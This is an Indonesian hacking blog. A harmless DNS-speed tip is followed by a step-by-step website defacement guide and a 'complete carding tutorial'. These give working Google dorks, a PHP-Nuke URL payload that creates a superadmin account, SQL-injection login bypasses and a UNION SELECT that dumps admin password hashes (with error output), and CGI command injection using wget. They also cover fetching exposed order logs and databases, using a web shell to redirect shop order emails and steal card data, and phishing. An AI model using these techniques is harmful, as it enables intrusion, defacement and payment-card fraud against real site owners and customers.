Labuan Technikal Cyber

Cara mempercepat koneksi speedy ente-ente nih

Apakah Anda menggunakan Speedy untuk connection internet dirumah? Jika Ya, pernahkah koneksi internet Speedy dirumah Anda lambat atau terganggu? Mungkin dari sebagian orang akan menjawab Ya. Saya juga pernah mengalami hal yang sama seperti itu.

Saya termasuk pelanggan setia Telkom Speedy, sudah hampir satu tahun menggunakan produk ini. Saya berlangganan Speedy Unlimited paket Family. Gejala pada gangguan pada koneksi internet tersebut bisa disebabkan oleh beberapa hal seperti karena adanya gangguan dari pusat, atau traffic sedang padat.

Ada tips cara untuk mensiasati hal tersebut, tips ini juga diberikan oleh CS Speedy saat Saya menanyakan penyebab dan cara mengatasi masalah ini. Yaitu dengan mengganti pada internet connection network dengan alamat DNS Server. Saya akan share caranya di halaman ini.

Berikut cara mempercepat koneksi internet speedy dengan mengubah alamat DNS Server pada komputer. Tips ini digunakan untuk Sistem Operasi Windows XP.



Klik Start – Control Panel

Selanjutnya klik Network and Internet Connections.

Lalu Klik Network Connections,

Pada Local Area Connections, Klik Kanan lalu pilih Properties,

Lalu Klik 2 kali pada Internet Protocol (TCP/IP),

Pada Tab General, Pilih tandai Use the following DNSA Server addresses dan isi pada kedua kolom dengan alamat DNS berikut.

Preffed DNS Server: 2.124.204.34

Alternate DNS server: 202.134.0.155

Lalu klik OK.



Selesai, hasilnya bisa Anda coba sendiri. Pengaruhnya tidak terlalu drastis, ini hanya siasat jika koneksi internet Speedy di rumah sedang tidak stabil.

Semoga Bermanfaat.
READMORE
Diposting oleh Unknown

 

Cara dan langkah DEFACE

Cara dan langkah DEFACE




Apa itu deface?
Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini dapat dilakukan karena terdapat lubang pada sistem security yang ada di dalam sebuah aplikasi.

Defacer website dapat merubah tampilan sebagian atau seluruhnya tergantung kemauan defacer dan lubang yang bisa dimasuki, namun jika dia sudah putus asa, defacer akan melakukan denial of servis (DoS) attack yaitu mengirimkan request palsu pada server yang berlebihan sehingga kerja server lambat dan lama-kelamaan server akan crash dan down.
Itulah deface.
Nah kalo udah ngerti apa itu defase, sekarang giliran cara melakukan deface....

Berikut cara langkah langkah untuk melakukan deface

Deface situs php nuke
Pake mbah www.google.com
ketik kalimat berikut :

allinurl:.com/nuke/index.php atau
allinurl:.org/nuke/index.php.
Nah ….. kalo udah ketemu targetnya maka langkah
selanjutnya adalah :
1. www.target.com/nuke/index.php

2. www.target.com/nuke/admin.php => (index.php yg diatas tadi dirubah menjadi admin.php)
 
3. Masukkan bug ini di belakang situs tadi :

?op=AddAuthor&add_aid=smartbekantan&add_name=
God&add_pwd=render07&add_email=
bekantan@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox

misal : www.target.com/nuke/admin.php?
op=AddAuthor&add_aid=smartbekantan&add_name=
God&add_pwd=render07&add_email=
bekantan@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox


Jika tidak bisa berarti situs tersebut sudah dipath oleh admin nya.
Tapi jika berhasil, maka di url/browsing akan muncul
www.target.com/nuke/admin.php?op=mod_author

4. Login, dan masukan id & password tadi.
Masih ingat kan ?
id=smartbekantan => liat yg diatas tadi
password=render07 => liat yg diatas tadi

Nah kita sekarang sudah masuk ke “Administration Menu” situs tersebut. Kamu sudah bisa utak atik dan menguasai website tersebut. 


deface asp dgn sql injection
1. buka browsing/url www.google.co.id
2. ketik site:go.id login.asp
    misal nya kita dapat target www.situstarget.com/login.asp
3. username dan pass ketik ‘or”=’
4. buka satu persatu file yg ada disana
5. cari file yg bisa kita ubah/deface
6. buka browsing/url baru lalu ketikkan target tadi misalnya www.situsarget.com
7. kalo hasil nya belum ada, klik tab refresh disamping url tersebut.

deface cgi
https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/
web_store.cgi?page=coart_frontpage.html <<< page="coart_frontpage.html|pwd|" page="coart_frontpage.html|wget" nya =""> https://bronte.netpresence.com.au/~wolfsecu/arai.html
…/home/sites/site52/users/wolfsecu/web/coartcds/Web_store <<< target =""> allinurl*.cgi * page:.*html+site:.us atau http://www.google.co.id/search?q=allinurl*.cgi%3Fpage%3D*.html+site:.com&hl=id&lr=&start=10&sa=N
target harus file .html diujungnya jika ingin ditambah |pwd|


Nih contoh yang berhasil saya deface (.....)

Itulah deface dan kamu sudah jadi defacer dan sudah jadi tersangka serta buronan sebagai defacer....


Pesan saya... HATI-HATI dalam bertindak. Karena deface termasuk perbuatan melanggar hukum.
READMORE
Diposting oleh Unknown

 

Cara Melakukan Peretasan atau Hacking, Cracking maupun Carding

Cara Melakukan Peretasan atau Hacking, Cracking maupun Carding

     Beberapa cara dalam melakukan peretasan terhadap kemajuan teknologi sekarang sudah sangat berbahaya. Kita harus lebih berhati-hati dalam dunia maya, karena banyak peretasan yang dilakukan oleh kelompok tertentu. Tetapi kelompok itu juga ada yang bersifat baik dan buruk. Dibawah ini adalah cara meretas dalam dunia maya :

  1.  Hacktivist : Hacktivis adalah hacker yang menggunakan teknologi untuk mengumumkan pandangan sosial, ideologi, agama, atau pesan politik.Dalam kasus yang lebih ekstrem, hacktivism digunakan sebagai alat untuk cyberterrorism.
  2.  Meretas komputer : Meretas komputer merupakan sebuah contoh umum dari eksploitasi keamanan adegan cara injeksi SQL,melalui lubang keamanan yang mungkin disebabkan dari praktik pemrograman bawah standar. Eksploitasi lain akan dapat digunakan melalui FTP, HTTP, PHP, SSH, Telnet dan beberapa halaman web.
  3. Vulnerability scanner : Sebuah Vulnerability scanner adalah alat yang digunakan untuk dengan cepat mengecek komputer pada jaringan untuk diketahui kelemahannya. Hacker juga biasanya menggunakan port scanner.port scanner ini adalah alat untuk melihat port pada komputer tertentu untuk mengakses komputer, dan kadang-kadang akan mendeteksi program nomor versinya.firewall melindungi komputer dari penyusup dengan membatasi akses ke port.
  4. Password cracking : Password cracking adalah sebuah aplikasi yang menangkap paket data, yang dapat digunakan untuk mencuri password dan data lain dalam transit melalui beberapa jaringan.
  5. Trojan horse : Trojan horse adalah program yang tampaknya akan melakukan satu hal, tetapi sebenarnya melakukan hal lain.Sebuah Trojan horse dapat digunakan untuk mendirikan sebuah pintu belakang dalam sebuah sistem komputer sedemikian rupa sehingga penyusup dapat memperoleh akses serupa kemudian.
  6. Virus : Virus adalah sebuah program replikasi diri yang menyebar dengan menyisipkan salinan dirinya ke dalam kode executable lain atau dokumen. Dengan demikian, virus komputer berperilaku mirip dengan virus biologis yang menyebar dengan memasukkan dirinya ke dalam sel-sel hidup.
  7. Worm : Seperti virus, worm juga merupakan program replikasi diri.Sebuah worm berbeda dari virus itu menyebar melalui jaringan komputer tanpa campur tangan pengguna.
  8. Spy Net : Adalah program yang secara otomatis memata matai komputer korban, tetapi hanya jaringan internetnya saja bukan aktivitas komputernya. Biasanya masuk melalui message/ e-mail dari orang yang tak dikenal melalui video chat dan lain lain.
  9. Keylogger : Adalah sebuah program yang dibuat khusus untuk memata-matai komputer tertentu dalam bentuk suara, gambar atau pun tulisan. Biasanya hanya di-inject melalui flashdisk ataupun USB (Universal Serial Bus).
READMORE
Diposting oleh Unknown

 

Tutor Carding Lengkap

Teknik Dengan Menggunakan User & Password Admin Default – SQL Injection Basic
# Teknik ini menggunakan kelemahan dari SQL Injection String Login, caranya cukup mudah hanya dengan memasukkan code di bawah ini pada user dan password pada login di website store admin. Adapun code user dan password itu diantaranya:

admin:’ or a=a–
admin:’ or 1=1–
user:’ or 1=1–
admin:’ or 1=1–
dsb

Contoh:
Silakan cari di google keyword: “/shopadmin.asp” or “/adminshop.asp” or “/shopadm.asp” or “/shoppingadmin.asp”
Misal target :

http://www.namasitusnya.com/shop/admin/shopadmin.asp

Silakan masukkan kombinasi kombinasi password yang telah saya sebutkan diatas, klo masuk berarti anda berhasil :)

2. Shopping Order Log – Informasi Log Order di Server
# Ini sangat mudah untuk di dapatkan, ada berbagai log yang tersimpan di berbagai server. Bisanya dalam bentuk *.log, *.rtf, *.txt, *.xls, dsb. Nah bagaimana mendapatkan informasi ini di web target. Itu tergantung dari imajinasi anda untuk menemukannya. Biasanya ini di server berbasis .cgi, .asp, .php, dsb.
Contoh:
Silakan cari di google keyword: “order.txt” or “order.log” or “order.asp” or “order.cgi”
atau inurl:order filetype:txt / inurl:order filetype:log dsb.
Misal target:

http://www.namasitusnya.net/shop/admin/log/order.log
http://www.namasitusnya.org/shop/order.cgi?dir=./order/order.log
http://www.namasitusnya.la/shopping/DCShop/orders/orders.txt

Selamat menemukan :)

3. Database Information – Database Source Location – Database Path
# Pada bagian ini, kita mendapatkan informasi lokasi database. Sehingga kita bisa mendownload database yang ada di server. Kebanyakan yang include di server .mdb.

Contoh:
Silakan cari di google keyword: “*.mdb” or “order.mdb” or “database.mdb”
atau menggunakan info DB: inurl: ESHOP, Lobby.asp, Proddetail.asp dsb.
Misal target:
http://www.namasitusnya.com/shop/shopadmin/database.mdb
http://www.namasitusnya.org//cgi-bin/eshop/database/order.mdb
http://www.namasitusnya.com/fpdb/shop.mdb
http://www.namasitusnya.com/shopping/data/vsproducts.mdb

Selamat mencari.. ^^


4. SQL Injection Advanced Shop Vulnreabilty
# Dibagian ini, akan dijelaskan mengenai teknik teknik menngunakan SQL Injection. Menggunakan sedikit kombinasi: union, join, select, update, dsb. Pada tutorial ini, diharapkan anda sudah bisa menggunakan SQL Injection sebelumnya.

Contoh:
Silakan Buka Google dgn key: “product_details.php?item_id=” or “products_rss.php” dsb
http://www.targetnya.com/shop/product_details.php?item_id=13
Ganti tulisan itu dengan :
products_rss.php?category_id=1' UNION SELECT concat(login,char(58)
,password),0 FROM va_admins — /*
jadi :http://www.targetnya.com/shop/products_rss.php?category_id=1
‘ UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*
dah kalo ada yang errornya kaya gini :

[color="Red"]DB ERROR 1064[/color]

[code]We are very sorry, but an error has occurred while processing your request. Please try the operation again by either pressing the Refresh button on your browser, or by going back one page using the Back button. If the error persists, please contact our web development team.

The details of the error are shown below. Please quote this in any correspondance regarding this problem.
Page URL: [url]http://www.targetnya.com/shop/products_rss.php?category_id=1‘%20UNION[/url]
%20SELECT%20concat(login,char(58),password),0%20FROM%20va_admins%20–%20/*
Referrer URL:
Database error: Invalid SQL: SELECT i.item_id, i.item_type_id, i.item_code, i.item_name, i.friendly_url, i.short_description, i.small_image, i.small_image_alt, i.big_image, i.big_image_alt, i.price, i.is_sales, i.sales_price, i.is_points_price, i.points_price, i.buy_link, i.is_sales, i.full_description, i.manufacturer_code, i.issue_date, ic.category_id, c.category_name, c.short_description AS category_short_description, c.full_description AS category_full_description FROM ((va_items i INNER JOIN va_items_categories ic ON i.item_id=ic.item_id AND ic.category_id IN (1' UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*,Admin:cca293929882ad831bf724a2589f1e20)) LEFT JOIN va_categories c ON c.category_id = ic.category_id ) WHERE i.is_showing = 1 GROUP BY i.item_id ORDER BY i.item_order, i.item_id
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*,Admin:cca2' at line 1
[/code]
Nah klo udah jangan lupa decrypt passwordnya ya :)

5. Admin Shop Send Mail Order
# Ini bagian sangat simple, pertama tama anda harus tau dulu database administrator. Biasanya ada di config shop adminnya.

Contoh:
Cari target inject di google, sampe dapet, sampe bisa jalanin rshell / c99 / backdoor lainya.
Misal target:
[url]http://www.namasitusnya.com/admin/shop/rshellbackdoorloe.php[/url]
Nah, kan udah masuk tuh di shellnya dia. trus cari config filenya sampe ketemu: config.php, db.php, configuration.php, database.php, db.asp, dsb. Trus buka / cat file tersebut sampe ketemu isi confignya seperti:
var $dbtype = ‘mysql’;
var $host = ‘localhost’;
var $user = ’shop24_admin’;
var $db = ’shopsex_site’;
var $mailer = ‘mail’;
var $ordermailsendto = ‘ben@netboost.com.au‘;

Nah pada bagian ini “var $ordermailsendto = ‘ben@netboost.com.au‘;”, di confignya ganti ajah ama email loe, misal di ganti ke: “var $ordermailsendto = ‘carding@gwdapetcarding.com‘;”.
Nah tinggal tunggu dah tu di email loe hasil ordernya. Simple tapi maknyuz.. Hahaha..

6. Phising & Scaming
# Tram.. Inilah yang paling banyak dilakukan oleh orang orang jaman sekarang. Hahaha.. Phising & scaming. Gampang banget ni.. Loe bisa aje bikin situs fake, pura pura jualan. Tapi sebenernya loe ambil data data card dari sang target. Namun ada beberapa syarat yang harus di penuhin. Syaratnya: Loe harus punya domain sendiri yang meyakinkan. Artinya, di halaman depan udah terdaftar trade mark website loe yang bikin si korban percaya bahwa site ini beneran, bukan scam. Coba klo di web inject, kan agak runyam. kebanyakan 90% gagal klo di web hasil inject. Scam & phising udah banyak di jelasin. So u pasti tahu donk gmn caranya.
Pertama, loe harus download source lengkap untuk scam + phising loe. trus loe install deh di server loe. Hasilnya silakan tunggu di email, soalnya biasanya klo scam set kirimnya ke email sang owner.

Nah gitu ajah dech dari gw, selamat berselancar dah, Segala tindak tanduk jadi tanggung jawab loe sendiri
Jadikanlah ilmu sebagai pembelajaran yang berharga dalam hidup!

READMORE
Diposting oleh Unknown

 
Langganan: Postingan (Atom)